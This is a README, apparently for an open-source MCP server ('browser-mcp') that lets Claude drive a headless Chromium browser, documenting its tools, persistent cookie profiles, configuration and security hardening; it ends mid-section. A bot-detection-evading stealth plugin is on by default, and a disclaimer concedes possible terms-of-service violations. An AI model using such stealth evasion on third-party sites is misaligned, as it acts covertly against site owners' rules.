A Model Context Protocol server that gives Claude (or any MCP client) a full browser — open pages, read content, click, type, take screenshots, inspect the accessibility tree, manage tabs, and emulate devices. Powered by Playwright with stealth mode and persistent cookie/localStorage profiles. HTTP transport, runs as a daemon in its own process.
Claude Code ──HTTP──▶ browser-mcp ──Playwright──▶ Chromium (headless)
                          │
                          ├── MCP sessions (per-client McpServer + transport)
                          ├── named profiles (persistent cookies / localStorage)
                          ├── BrowserContext per profile (reused by sessions)
                          ├── 25 tools: open / read / click / type / snapshot / …
                          └── network ring, AX snapshot store, CSRF-hardened HTTP
Disclaimer: This tool automates browser interactions and may violate the terms of service of websites it accesses. You are solely responsible for how you use it and which sites you interact with. The authors assume no liability for any consequences arising from its use.
- Why
- Quick start
- Features
- Named profiles
- Tools reference
- Configuration
- Architecture
- Security model
- Testing
- Docker
- Platform notes
- Development
- FAQ
- License
Claude Code's built-in WebFetch can grab a URL as text, but it's a one-shot:
no clicks, no form fills, no cookies, no state. For anything beyond "paste
this article":
- Log into the site, then do X. browser-mcp keeps cookies/localStorage on disk in a named profile, so an authenticated session survives restarts. Log in once via browser_open_visible, come back headless tomorrow.
- "What's on this SPA right now?" browser_snapshot returns the accessibility tree (role, name, value, state) via Chrome DevTools Protocol. Much more reliable than scraping Markdown on a React dashboard.
- Form-driven workflows. browser_click / browser_type use Playwright's auto-waiting with role/label locators, which stay stable across markup changes with no CSS selectors to maintain. browser_expect retries assertions up to a timeout, so you don't have to weave waits manually.
- Capture evidence. browser_save writes PDF / MHTML / raw HTML; browser_screenshot captures viewport/full-page/element. Useful for the "show me what the page looked like when you filed the bug" handoff.
- Debug SPA behaviour. browser_network_log exposes a ring buffer of the last 500 requests (URL, method, status, timing, failure reason) so you can find the 401 the page silently swallowed.
- Agent-friendly surface. Role-based locators + accessibility snapshots mean the model doesn't have to invent CSS selectors or guess the markup.
# Published package (preferred)
npm install -g @graphmemory/browser-mcp
browser-mcp
# Or without install
npx -y @graphmemory/browser-mcp
# Or Docker (see "Docker" below for auth requirements)
docker run --rm -p 7777:7777 -e BROWSER_MCP_API_KEY=$(openssl rand -hex 32) \
  ghcr.io/graph-memory/browser-mcp:latest
Chromium is installed automatically on first run (postinstall hook).
Boot log:
browser-mcp listening on http://127.0.0.1:7777/mcp
health → http://127.0.0.1:7777/health
/mcp → default profile
/mcp/<name> → named profile (e.g. /mcp/test1)
auth → DISABLED (loopback only)
cors_origin → null
max_sessions → 50
Add to ~/.claude.json (user-global) or .mcp.json (project-local):
{
"mcpServers": {
"browser": {
"type": "http",
"url": "http://127.0.0.1:7777/mcp"
}
}
}
With auth (required when bound to a non-loopback interface):
{
"mcpServers": {
"browser": {
"type": "http",
"url": "http://127.0.0.1:7777/mcp",
"headers": { "Authorization": "Bearer ${BROWSER_MCP_API_KEY}" }
}
}
}
Ask Claude in plain language:
Open example.com, find the "Sign in" link, read the resulting page, and fill the email field with test@example.com.
It will sequence browser_open → browser_click → browser_read →
browser_type for you. Keep iterating without leaving the conversation.
browser_open { url: "https://example.com" }
browser_snapshot { compact: true } # what can I click/type
browser_click { target: "Sign in", target_type: "role", role: "button" }
browser_type { target: "Email", target_type: "label", text: "a@b.co" }
browser_expect { assertion: "url_matches", expected: "/dashboard$" }
browser_read { mode: "markdown" }
browser_save { format: "pdf", path: "./dashboard.pdf" }
browser_network_log { failed_only: true, limit: 20 }
browser_cookies { action: "get", urls: ["https://example.com/"] }
- 25 tools covering navigation, reading, interaction, assertions, IO, network inspection, cookies, permissions, and device emulation. See the Tools reference.
- Persistent named profiles. Each URL path (/mcp/<name>) gets its own cookies and localStorage under ~/.browser-mcp/profiles/<name>/. Log in once; restart the supervisor or Claude Code; the session is still there.
- Accessibility-first. browser_snapshot pulls the AX tree from Chrome DevTools Protocol (Playwright 1.40 removed the built-in AX API). Compact mode strips decorative containers and keeps only interactive elements plus landmarks, which suits agents that need "what can I click" without reading React-generated DOM noise.
- Diffable snapshots. browser_snapshot { store_as: "before" } → do something → { diff_against: "before" } returns added/removed/state-changed nodes as a compact diff. Compact mode switches on automatically when diffing to suppress spurious noise.
- Role/label locators. Every interact tool accepts target_type: role|label|text|placeholder|testid|selector. Prefer role for buttons/links and label for form fields: robust against markup changes, zero CSS maintenance.
- browser_expect with retry. 13 assertion kinds (visible/hidden/enabled/disabled, text_equals/contains/matches, value_equals, count, url_equals/matches, title_equals/matches). Retries up to a timeout so you don't need a separate browser_wait for flaky conditions.
- browser_read with compact mode. Markdown/text/HTML extraction; the optional compact flag strips nav/header/footer/aside/script/style/iframe and ARIA landmark chrome. Automatic on text/html (pages would otherwise be drowned in boilerplate); off on markdown (Readability already picks the article).
- Network ring buffer. 500 most recent requests per profile, across all tabs. Filter by tab, URL regex, method, min_status, or failed_only. Surfaces the 4xx/5xx the UI quietly swallowed.
- Visible mode for login. browser_open_visible shuts down the headless context and reopens in a visible window for manual interaction (CAPTCHAs, SSO, 2FA). Cookies land in the persistent profile; closing the window returns to headless.
- Device emulation. browser_configure applies viewport/DSR/UA/mobile/locale/color-scheme presets. Named device_preset (iphone-15, ipad-pro, pixel-8, desktop-retina…) applies a full profile atomically.
- File IO. browser_save writes PDF (headless only)/MHTML/HTML; browser_upload wires <input type=file> with path validation; browser_download_wait captures a download triggered by click or navigation and honours the server-suggested filename.
- Stealth plugin. playwright-extra + puppeteer-extra-plugin-stealth applied by default. Disable with --no-stealth if it breaks a specific site.
- Supervisor-env isolation. All BROWSER_MCP_* vars (API key, host, caps) are filtered out of Chromium's env so page scripts can't fingerprint the supervisor configuration.
- CSRF-hardened HTTP. Content-Type: application/json required, Origin header whitelist, API key compared with crypto.timingSafeEqual.
- Refuse-to-start safety. Bound to a non-loopback interface without an API key? Exits with code 2 and an explanation. Override with --allow-insecure if you know what you're doing.
- Session + tab TTL. Idle MCP sessions reaped after session_ttl (default 30 min); inactive tabs auto-closed after tab_ttl (default 10 min). Hard cap on concurrent sessions (max_sessions, default 50).
- Multi-arch Docker image. linux/amd64 + linux/arm64, non-root browser user, tini as PID 1 for zombie reaping, healthcheck wired to /health.
- Full test suite. 304 tests (unit + integration against a real headless Chromium) covering every tool handler, the HTTP server (auth/CSRF/session lifecycle), and the AX-tree pipeline. See Testing.
Each MCP endpoint URL can include a profile name that isolates cookies, localStorage, and browser state:
http://127.0.0.1:7777/mcp → "default" profile
http://127.0.0.1:7777/mcp/test1 → "test1" profile
http://127.0.0.1:7777/mcp/my-scraper → "my-scraper" profile
Profile names must match ^[a-zA-Z0-9_-]{1,64}$ (letters, digits, dashes,
underscores; 1–64 chars) — validated at the HTTP layer so path traversal can't
escape the base directory.
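As a rough illustration of that check, the sketch below maps a request path to a profile name. The helper name profileFromPath is hypothetical and the real routing code may differ; only the regex and the /mcp → "default" mapping are taken from the text above.

```typescript
// Regex quoted from the README; everything else here is an illustrative assumption.
const PROFILE_NAME = /^[a-zA-Z0-9_-]{1,64}$/;

// Hypothetical helper: returns the profile for a request path, or null to reject.
function profileFromPath(pathname: string): string | null {
  if (pathname === "/mcp") return "default";
  if (!pathname.startsWith("/mcp/")) return null;
  const name = pathname.slice("/mcp/".length);
  // "/" and "." are outside the character class, so "../" segments never match.
  return PROFILE_NAME.test(name) ? name : null;
}
```

Because the name is validated before it is ever joined onto the profile base directory, no path normalisation is needed afterwards.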
Profiles are stored at ~/.browser-mcp/profiles/<name>/ (override with
--profile-dir or BROWSER_MCP_PROFILE_DIR).
Multiple MCP sessions on the same profile share one BrowserContext. When the
last session on a profile expires, the context shuts down and Chromium exits.
{
"mcpServers": {
"browser": {
"type": "http",
"url": "http://127.0.0.1:7777/mcp"
},
"browser-test": {
"type": "http",
"url": "http://127.0.0.1:7777/mcp/test"
}
}
}
All tools accept structured arguments (zod-validated). Responses are single-block
text content (except browser_screenshot, which returns an image).
Open a URL in a new tab, or navigate an existing tab if tab_id is given.
Waits for DOMContentLoaded plus a short request-idle settle. Does not
return page content — call browser_read afterwards. Returns HTTP status,
final URL, title, and tab_id.
| Parameter | Type | Required | Description |
|---|---|---|---|
| url | string (URL) | yes | Absolute URL to navigate to |
| tab_id | string | no | If set, navigate this existing tab instead of opening a new one |
Read the current (or specified) tab. mode=markdown (default) extracts the
main article via Mozilla Readability and converts to Markdown. mode=text
returns body innerText. mode=html returns raw HTML.
compact=true strips nav / header / footer / aside / script / style / svg /
iframe and ARIA landmark chrome (banner, navigation, complementary,
contentinfo, search) before rendering. Defaults on for text / html,
off for markdown (Readability already picks the article). Useful for
dashboards / SPAs where Readability bails out.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| mode | "markdown" \| "text" \| "html" | no | "markdown" | Extraction mode |
| selector | string | no | - | CSS selector to narrow extraction to a specific element |
| compact | boolean | no | auto | Strip chrome (see above) |
| max_chars | integer | no | 50000 | Cap output length (also via BROWSER_MCP_MAX_CHARS) |
| tab_id | string | no | active tab | Tab to read from |
Find text occurrences on the current page. Returns up to limit snippets,
each with surrounding context and a stable CSS selector suitable for
browser_click / browser_type.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| query | string | yes | - | Substring (case-insensitive) |
| limit | integer (1–50) | no | 10 | Max matches |
| tab_id | string | no | active tab | Tab to search in |
Click an element using one of several locator strategies. Playwright auto-waits for the element to be visible, enabled, and stable; the server additionally waits for network idle after the click.
Strategy priority (most → least reliable): role > label > text >
placeholder > testid > selector. Prefer role for buttons/links and
label for form fields.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| target | string | yes | - | Description of the element (see target_type) |
| target_type | text\|role\|label\|placeholder\|testid\|selector | no | text | Locator strategy |
| role | ARIA role | no | "button" when target_type="role" | Required for role locator |
| exact | boolean | no | false | Exact match vs substring |
| tab_id | string | no | active tab | Tab to act on |
Examples:
{ "target": "Sign in", "target_type": "role", "role": "button" }
{ "target": "Home", "target_type": "role", "role": "link", "exact": true }
{ "target": "submit", "target_type": "testid" }
Fill an input/textarea/contenteditable with text. Auto-waits for the field to
be actionable. Uses Playwright's fill semantics (existing value is replaced).
If submit=true, presses Enter after typing.
Strategy priority for forms: label > placeholder > testid > selector.
label is the most robust for typical forms.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| target | string | yes* | - | Target element (see target_type). *Accepts selector for back-compat |
| target_type | same as click | no | selector | Locator strategy |
| role | ARIA role | no | - | For role locator (typically textbox) |
| exact | boolean | no | false | Exact match |
| text | string | yes | - | Text to type |
| submit | boolean | no | false | Press Enter after typing |
| tab_id | string | no | active tab | Tab to act on |
| selector | string | no | - | Deprecated alias for target with target_type=selector |
Assert a condition on the page. Retries up to timeout_ms before failing —
no separate browser_wait needed for flaky conditions. Returns PASS or
FAIL with expected and actual in the error body.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| assertion | one of 13 (see below) | yes | - | What to assert |
| target | string | depends | - | Element target (required for element / text / count / value assertions) |
| target_type | same as click | no | selector | Locator strategy |
| role | ARIA role | no | - | For role locator |
| exact | boolean | no | false | Exact match |
| expected | string \| number | depends | - | For text/value/count/url/title; for *_matches it's a regex |
| timeout_ms | integer (1–60000) | no | 5000 | Retry window |
| tab_id | string | no | active tab | Tab to check |
Assertions: visible, hidden, enabled, disabled, text_equals,
text_contains, text_matches, value_equals, count, url_equals,
url_matches, title_equals, title_matches.
Examples:
{ "assertion": "visible", "target": "Sign in", "target_type": "role", "role": "button" }
{ "assertion": "text_contains", "target": "#status", "expected": "done" }
{ "assertion": "count", "target": "input", "expected": 3 }
{ "assertion": "url_matches", "expected": "/dashboard$" }
Return an accessibility snapshot: a compact tree of semantic elements (role, name, value, state) pulled from Chrome's accessibility API via CDP. Much more reliable than scraping Markdown on SPAs.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| selector | string | no | - | Scope to subtree rooted at this CSS selector |
| max_depth | integer (0–50) | no | - | Truncate deeper children with a "N hidden children" summary |
| interesting_only | boolean | no | true | Prune decorative/hidden nodes (Playwright convention) |
| compact | boolean | no | auto | Keep only interactive elements + structural landmarks. Auto-on when diffing |
| store_as | string (1–64) | no | - | Save snapshot under this name for later diffing |
| diff_against | string (1–64) | no | - | Return added / removed / changed vs the stored snapshot |
| format | "yaml" \| "json" | no | yaml | Output format |
| tab_id | string | no | active tab | Tab to snapshot |
Sample output (yaml) — decorative InlineTextBox nodes filtered,
StaticText children whose text matches their parent's name collapsed, and
anonymous containers (listitem, cell) inherit their text content as name:
- RootWebArea "Login" [focused]
- heading "Login" [level=1]
- textbox "Email" [required]
- textbox "Password" [required]
- button "Sign in"
Compact strips generic wrappers, keeping only what the user can interact with plus structural anchors:
- form
- textbox "Email"
- textbox "Password"
- button "Sign in"
Diff output — after store_as: "before" → some actions → diff_against: "before":
── diff vs "before" ──
Added (2):
+ listitem "buy milk"
+ listitem "walk dog"
Changed (1):
~ button "Add" [-] → [focused]
Caveat: the diff is path-based (role+name chain from root). Structural
changes that shift sibling order can cause spurious add/remove pairs on
otherwise-unchanged nodes. Works best for "I clicked X, what appeared" rather
than "detect exactly one element changed". Value changes on textboxes are
reported as changed (value is excluded from node identity).
Grant (or clear) browser permissions — camera, microphone, geolocation, notifications, clipboard, etc. Use before navigating so the prompt never appears.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| grant | "all" \| "none" \| array | yes | - | Which permissions |
| origin | URL | no | current tab's origin | Origin to apply (http/https only) |
| tab_id | string | no | active tab | Tab whose origin to use |
Supported permissions: geolocation, midi, midi-sysex, notifications,
camera, microphone, background-sync, ambient-light-sensor,
accelerometer, gyroscope, magnetometer, clipboard-read,
clipboard-write, payment-handler, storage-access.
Save the current page to disk.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| format | "pdf" \| "mhtml" \| "html" | yes | - | Output format |
| path | string | yes | - | Absolute or relative; parent dirs created |
| full_page | boolean | no | false | PDF only: full scrollable page |
| landscape | boolean | no | false | PDF only |
| tab_id | string | no | active tab | Tab to save |
- pdf: Chromium's native print-to-PDF. Headless only (Playwright limitation).
- mhtml: single-file archive with resources inlined. Best for offline handoff.
- html: raw page.content().
Upload files to an <input type="file">. Paths validated to exist before
the call. For <input multiple> pass several files; otherwise one.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| target | string | yes | - | File input |
| target_type | selector\|label\|testid | no | selector | Locator strategy |
| files | array of paths (1–32) | yes | - | Absolute or relative; each validated to be a regular file |
| tab_id | string | no | active tab | Tab to act on |
Trigger a download (via click or navigation) and capture the resulting file.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| action | click \| navigate | no | click | How to trigger |
| target | string | iff click | - | Button/link that starts the download |
| target_type | same as click | no | text | Locator strategy |
| role | ARIA role | no | - | For role locator |
| url | URL | iff navigate | - | Direct download URL |
| save_to | string | yes | - | Path; ends with / or existing dir → server-suggested filename |
| timeout_ms | integer (1–600000) | no | 60000 | Total wait for start + complete |
| tab_id | string | no | active tab | Tab to act on |
Read, write, or clear cookies in the profile.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| action | get \| set \| clear | yes | - | Operation |
| urls | array of URLs | no | - | get: scope to these URLs |
| cookies | array of cookie objects | iff set | - | Each needs (domain+path) or a single url. Fields: name, value, domain, path, url, expires, httpOnly, secure, sameSite |
Inspect recent network requests. Ring buffer of the last 500 per profile, across all tabs.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| tab_id | string | no | all tabs | Only entries from this tab |
| limit | integer (1–500) | no | 100 | Max entries |
| url_regex | string (regex) | no | - | Only URLs matching |
| method | HTTP method | no | - | Filter by method |
| failed_only | boolean | no | false | Only net errors (ERR_*, blocked) |
| min_status | integer (100–599) | no | - | Only responses with status ≥ this |
Output:
── 3 entries (of 47 in ring) ──
14:16:32.170 200 GET https://api/v1/users [xhr, 85ms]
14:16:32.220 404 GET https://api/v1/missing [xhr, 12ms]
14:16:32.300 FAIL(...) POST https://third-party/track [fetch, 2013ms]
Scroll the current tab. up/down by amount pixels; top/bottom jumps.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| direction | up\|down\|top\|bottom | no | down | Direction |
| amount | integer | no | 800 | Pixels (ignored for top/bottom) |
| tab_id | string | no | active tab | Tab to act on |
Navigate in history. The only parameter is tab_id. back/forward report
"Already at earliest/latest history entry" when there is nowhere to go.
Wait for an element to reach a given state.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| selector | string | yes | - | CSS selector |
| state | visible\|hidden\|attached\|detached | no | visible | Target state |
| timeout | integer | no | 10000 | Max wait (ms) |
| tab_id | string | no | active tab | Tab |
Execute a JavaScript expression in the page and return the JSON-serialized result.
| Parameter | Type | Required | Description |
|---|---|---|---|
| expression | string | yes | JS expression (must return JSON-serializable) |
| tab_id | string | no | Tab |
List tabs (→ marks active), switch active tab, close tab.
Open a URL in a visible (non-headless) Chrome window for manual interaction — login, CAPTCHA, SSO, 2FA. Cookies/localStorage land in the persistent profile. Closing the window returns to headless mode.
| Parameter | Type | Required | Description |
|---|---|---|---|
| url | string (URL) | yes | URL to open |
Take a PNG screenshot. Default viewport; full_page=true for full scroll;
selector for a specific element (scrolled into view first).
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| full_page | boolean | no | false | Viewport vs whole page. Ignored when selector set |
| selector | string | no | - | Capture only this element |
| tab_id | string | no | active tab | Tab |
Returns an image content block (PNG, base64).
Change browser settings at runtime. All parameters optional — pass only what you want to change. Some changes trigger a browser-context restart (all open tabs are closed, response flags it).
No-restart (per-tab):
- viewport_preset: mobile / tablet / desktop / desktop-hd / desktop-2k
- viewport_width + viewport_height: custom
- color_scheme: light / dark / no-preference
- tab_id: which tab

No-restart (context-wide):
- user_agent: custom
- ua_preset: chrome-desktop / chrome-mobile / safari-desktop / safari-mobile / firefox-desktop
- locale: e.g. en-US, ru-RU, ja-JP

Restart required:
- device_preset: iphone-15 / iphone-se / ipad / ipad-pro / pixel-8 / galaxy-s24 / desktop-retina
- device_scale_factor: e.g. 2 for retina, 3 for iPhone
- is_mobile: enables isMobile + hasTouch
Device presets:
| Preset | Viewport | Scale | Mobile | Touch |
|---|---|---|---|---|
| iphone-15 | 393×852 | 3× | yes | yes |
| iphone-se | 375×667 | 2× | yes | yes |
| ipad | 820×1180 | 2× | yes | yes |
| ipad-pro | 1024×1366 | 2× | yes | yes |
| pixel-8 | 412×915 | 2.625× | yes | yes |
| galaxy-s24 | 360×780 | 3× | yes | yes |
| desktop-retina | 1280×900 | 2× | no | no |
All flags are optional — loopback-only defaults work out of the box. Priority: CLI flag > env var > default.
| Flag | Env | Default | Notes |
|---|---|---|---|
| -p, --port | BROWSER_MCP_PORT | 7777 | |
| -H, --host | BROWSER_MCP_HOST | 127.0.0.1 | |
| --api-key | BROWSER_MCP_API_KEY | (off) | required when host ≠ loopback |
| --allow-insecure | BROWSER_MCP_ALLOW_INSECURE | false | override refuse-to-start |
| --cors-origin | BROWSER_MCP_CORS_ORIGIN | null | comma-separated origins or * |
| --max-sessions | BROWSER_MCP_MAX_SESSIONS | 50 | concurrent MCP sessions |
| --session-ttl | BROWSER_MCP_SESSION_TTL_SEC | 1800 | idle session reaper (30 min) |
| --[no-]headless | BROWSER_MCP_HEADLESS | 1 | 0 = visible |
| --[no-]stealth | BROWSER_MCP_STEALTH | 1 | playwright-extra + stealth plugin |
| --channel | BROWSER_MCP_CHANNEL | chrome | Chromium channel (chrome, msedge, chromium) |
| --[no-]javascript | BROWSER_MCP_JAVASCRIPT | 1 | |
| --viewport | BROWSER_MCP_VIEWPORT | 1280x900 | WxH |
| --device-scale-factor | BROWSER_MCP_DEVICE_SCALE_FACTOR | 1 | |
| --[no-]mobile | BROWSER_MCP_MOBILE | 0 | |
| --user-agent | BROWSER_MCP_USER_AGENT | - | |
| --locale | BROWSER_MCP_LOCALE | - | Accept-Language |
| --color-scheme | BROWSER_MCP_COLOR_SCHEME | - | |
| --proxy | BROWSER_MCP_PROXY | - | e.g. http://proxy:8080 |
| --proxy-bypass | BROWSER_MCP_PROXY_BYPASS | - | comma-separated domains |
| --proxy-username | BROWSER_MCP_PROXY_USERNAME | - | |
| --proxy-password | BROWSER_MCP_PROXY_PASSWORD | - | |
| --tab-ttl | BROWSER_MCP_TAB_TTL_SEC | 600 | inactive tab reaper (10 min) |
| --max-chars | BROWSER_MCP_MAX_CHARS | 50000 | cap for browser_read |
| --max-html-bytes | BROWSER_MCP_MAX_HTML_BYTES | 10000000 | HTML cap before JSDOM parse (OOM guard) |
| --settle-ms | BROWSER_MCP_SETTLE_MS | 500 | quiet-window duration |
| --settle-timeout-ms | BROWSER_MCP_SETTLE_TIMEOUT_MS | 3000 | hard settle timeout after nav/click |
| --profile-dir | BROWSER_MCP_PROFILE_DIR | ~/.browser-mcp/profiles | profile base dir |
| Env | Default | Effect |
|---|---|---|
| BROWSER_MCP_ALLOW_FILE_URLS | 0 | Permit file:// in browser_open / browser_download_wait |
| BROWSER_MCP_ALLOW_PRIVATE_NETWORKS | 0 | Permit loopback / RFC1918 / link-local / ULA IPs |
| BROWSER_MCP_ALLOW_ANY_WRITE_PATH | 0 | Disable write sandbox for browser_save / browser_download_wait |
| BROWSER_MCP_ALLOW_ANY_UPLOAD_PATH | 0 | Disable read sandbox for browser_upload |
| BROWSER_MCP_SANDBOX_DIR | ~/.browser-mcp | Base dir for download / upload sandboxes |
| BROWSER_MCP_READ_BODY_TIMEOUT_MS | 10000 | Wall-clock cap on HTTP body read (slow-loris) |
browser-mcp --help prints the CLI list.
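The "CLI flag > env var > default" priority can be pictured with a small resolver. This is only a sketch: resolveSetting and parseViewport are hypothetical names, and treating an empty env var as unset is an assumption rather than documented behaviour.

```typescript
// Hypothetical helper illustrating "CLI flag > env var > default".
function resolveSetting<T>(
  cli: string | undefined,
  env: string | undefined,
  fallback: T,
  parse: (raw: string) => T,
): T {
  if (cli !== undefined) return parse(cli);
  // Assumption: an empty env var counts as "not set".
  if (env !== undefined && env !== "") return parse(env);
  return fallback;
}

// Parses the WxH viewport format from the table, e.g. "1280x900".
function parseViewport(raw: string): { width: number; height: number } {
  const m = /^(\d+)x(\d+)$/.exec(raw);
  if (!m) throw new Error(`invalid viewport: ${raw}`);
  return { width: Number(m[1]), height: Number(m[2]) };
}

// No flag given, so the env value wins over the built-in default.
const port = resolveSetting(undefined, "9090", 7777, Number);

// Flag given, so it wins over both the env value and the default.
const viewport = resolveSetting(
  "390x844",
  "1280x900",
  { width: 1280, height: 900 },
  parseViewport,
);
```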
browser-mcp is one Node process. Each named profile lazily launches its own
Chromium (launchPersistentContext) on first use. Multiple concurrent MCP
sessions on the same profile share that context. When the last session on a
profile expires, the context shuts down.
Transport: @modelcontextprotocol/sdk's StreamableHTTPServerTransport on
top of node:http. One TCP listener, endpoints /mcp, /mcp/<profile>, and
/health.
Each MCP client gets a session on initialize (random UUID in
mcp-session-id). Sessions have their own McpServer instance and transport.
Idle sessions are reaped after session_ttl via a 60 s interval timer.
Hard caps: max_sessions (503 on overflow), MAX_BODY_BYTES = 1 MB per
request, per-tool zod .max(…) on every user string.
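A minimal sketch of the session cap and idle reaper described above, assuming a plain in-memory map. SessionTable and its method names are illustrative, not the project's actual types; the defaults mirror max_sessions = 50 and session_ttl = 30 min.

```typescript
interface SessionEntry {
  lastSeen: number;   // epoch ms of the last request on this session
  close: () => void;  // would tear down the transport and McpServer
}

class SessionTable {
  private readonly sessions = new Map<string, SessionEntry>();

  constructor(
    private readonly maxSessions = 50,
    private readonly ttlMs = 30 * 60 * 1000,
  ) {}

  // Returns false when the cap is hit; the caller would answer 503.
  create(id: string, now: number, close: () => void): boolean {
    if (this.sessions.size >= this.maxSessions) return false;
    this.sessions.set(id, { lastSeen: now, close });
    return true;
  }

  // Called on every request so active sessions are never reaped.
  touch(id: string, now: number): void {
    const s = this.sessions.get(id);
    if (s) s.lastSeen = now;
  }

  // Meant to run from a periodic timer (the text mentions a 60 s interval).
  reap(now: number): string[] {
    const reaped: string[] = [];
    for (const [id, s] of this.sessions) {
      if (now - s.lastSeen > this.ttlMs) {
        s.close();
        this.sessions.delete(id);
        reaped.push(id);
      }
    }
    return reaped;
  }

  get size(): number {
    return this.sessions.size;
  }
}
```

Passing the clock in as a parameter keeps the reaper deterministic in tests; production code would call reap(Date.now()) from setInterval.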
Request pipeline for /mcp:
→ URL check (startsWith /mcp) + profile-name validation
→ Origin check (allowlist; unset Origin = native client, always allowed)
→ Content-Type check (POST requires application/json)
→ Auth check (Bearer, timingSafeEqual)
→ session lookup / create (cap applied on create)
→ MCP SDK transport.handleRequest
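The first four pipeline stages can be sketched as one pure function. The names IncomingLike, Policy, and checkRequest are hypothetical, the rejection status codes are assumptions (the README does not state them), and wildcard origins are left out for brevity.

```typescript
import { createHash, timingSafeEqual } from "node:crypto";

interface IncomingLike {
  method: string;
  path: string;
  headers: Record<string, string | undefined>; // lower-cased names, as node:http provides
}

interface Policy {
  apiKey?: string;          // undefined = auth disabled
  allowedOrigins: string[]; // empty = only requests without an Origin header
}

// Hash both sides first so timingSafeEqual always sees equal-length buffers.
function keysMatch(presented: string, expected: string): boolean {
  const a = createHash("sha256").update(presented).digest();
  const b = createHash("sha256").update(expected).digest();
  return timingSafeEqual(a, b);
}

// Returns the HTTP status to answer with; 200 means "hand over to the transport".
function checkRequest(req: IncomingLike, policy: Policy): number {
  // 1. URL check + profile-name validation
  if (!/^\/mcp(\/[a-zA-Z0-9_-]{1,64})?$/.test(req.path)) return 404;

  // 2. Origin check: no Origin header means a native client
  const origin = req.headers["origin"];
  if (origin !== undefined && !policy.allowedOrigins.includes(origin)) return 403;

  // 3. Content-Type check for POST (parameters such as charset are ignored)
  if (req.method === "POST") {
    const type = (req.headers["content-type"] ?? "").split(";")[0].trim().toLowerCase();
    if (type !== "application/json") return 415;
  }

  // 4. Bearer auth with a timing-safe comparison
  if (policy.apiKey !== undefined) {
    const header = req.headers["authorization"] ?? "";
    const token = header.startsWith("Bearer ") ? header.slice(7) : "";
    if (!keysMatch(token, policy.apiKey)) return 401;
  }
  return 200;
}
```

Running the cheap structural checks before the auth comparison matches the order listed above; session lookup and the SDK hand-off would follow a 200.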
src/app.ts exports createApp(), which builds the http.Server (exposed as
httpServer on the returned object) with no side effects at import time; that
keeps integration testing simple.
src/index.ts is a thin bootstrap that calls createApp().httpServer.listen()
and wires SIGINT/SIGTERM.
One instance per profile. Holds:
- The BrowserContext (Playwright's persistent context).
- tabs: Map<tab_id, Page>, with an 8-char nanoid per tab.
- lastUsed: Map<tab_id, timestamp>, which drives the TTL sweeper.
- netLog: NetLogEntry[], a fixed-capacity ring (500 entries) fed by page request/requestfinished/requestfailed listeners.
- snapshotStore: Map<name, AxNode>, user-named AX snapshots for browser_snapshot diffing.
- _overrides: context-level settings from browser_configure (applied on next context creation).
Every 60 s the sweeper closes inactive tabs older than tab_ttl (the
currently-active tab is always spared).
On shutdown() the context is closed and all Chromium subprocesses exit.
Playwright 1.40 removed page.accessibility.snapshot(), so browser-mcp
pulls the AX tree directly from Chrome DevTools Protocol:
CDP Accessibility.enable
├─ full tree: Accessibility.getFullAXTree (for top-level snapshot)
└─ subtree: DOM.querySelector → describeNode → getPartialAXTree
(with fetchRelatives, includes ancestors)
↓
cdpAxToTree(nodes, interestingOnly):
- pick the root node (parent not in the map)
- walk childIds recursively
- skip ALWAYS_NOISY_ROLES (InlineTextBox)
- if interestingOnly: flatten ignored nodes
- collect role/name/value/description + a curated property set
↓
collapseRedundantText(node):
- if parent is anonymous and has StaticText children, promote their text
as the parent's name (gives listitem / cell / row identity)
- drop StaticText children whose text matches parent's name exactly
↓
filterCompact(node): (if compact=true)
- keep interactive roles (button, link, textbox, checkbox, option, …)
- keep structural landmarks (heading, navigation, main, form, dialog,
list, listitem, table, row, cell, …)
- drop everything else; hoist single interesting descendants
↓
renderAxNode(node): YAML-ish output for the wire
- "N role "name" [attr1=v1, attr2, …]"
- indented children
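The compact stage of that pipeline could look roughly like the following. AxLite and filterCompactSketch are hypothetical names, the role sets are abbreviated from the lists above, and this version hoists every surviving descendant of a dropped node, which is a simplification of the hoisting rule described.

```typescript
interface AxLite {
  role: string;
  name?: string;
  children?: AxLite[];
}

// Role sets abbreviated from the pipeline description; the real sets are longer.
const INTERACTIVE = new Set(["button", "link", "textbox", "checkbox", "option"]);
const STRUCTURAL = new Set([
  "heading", "navigation", "main", "form", "dialog",
  "list", "listitem", "table", "row", "cell",
]);

// Returns the kept nodes for a subtree: either the node itself (with filtered
// children) or, when the node is dropped, whatever survived beneath it.
function filterCompactSketch(node: AxLite): AxLite[] {
  const kept: AxLite[] = [];
  for (const child of node.children ?? []) {
    kept.push(...filterCompactSketch(child));
  }
  if (INTERACTIVE.has(node.role) || STRUCTURAL.has(node.role)) {
    return [{ role: node.role, name: node.name, children: kept }];
  }
  return kept; // wrapper dropped, survivors hoisted to the parent level
}
```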
Diff algorithm (diffSnapshots):
- Flatten both trees to Map<path, AxNode> where path = /role|name/role|name/… (value excluded from the signature so textbox edits don't look like remove+add).
- Keys present in after but not before → added.
- Keys present in before but not after → removed.
- Common keys where stateSummary(a) !== stateSummary(b) → changed. State summary includes value, checked, pressed, selected, disabled, expanded, focused.
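A compact sketch of that path-based diff follows. The AxTreeNode shape and the function names are assumptions made for illustration; in particular, keeping only the first node when two siblings share a path is a simplification, not necessarily what diffSnapshots does.

```typescript
interface AxTreeNode {
  role: string;
  name?: string;
  value?: string;
  state?: Record<string, string | boolean>; // checked, pressed, focused, ...
  children?: AxTreeNode[];
}

// Flatten to path → node, where path is the role|name chain from the root.
function flattenTree(
  node: AxTreeNode,
  prefix = "",
  out = new Map<string, AxTreeNode>(),
): Map<string, AxTreeNode> {
  const path = `${prefix}/${node.role}|${node.name ?? ""}`;
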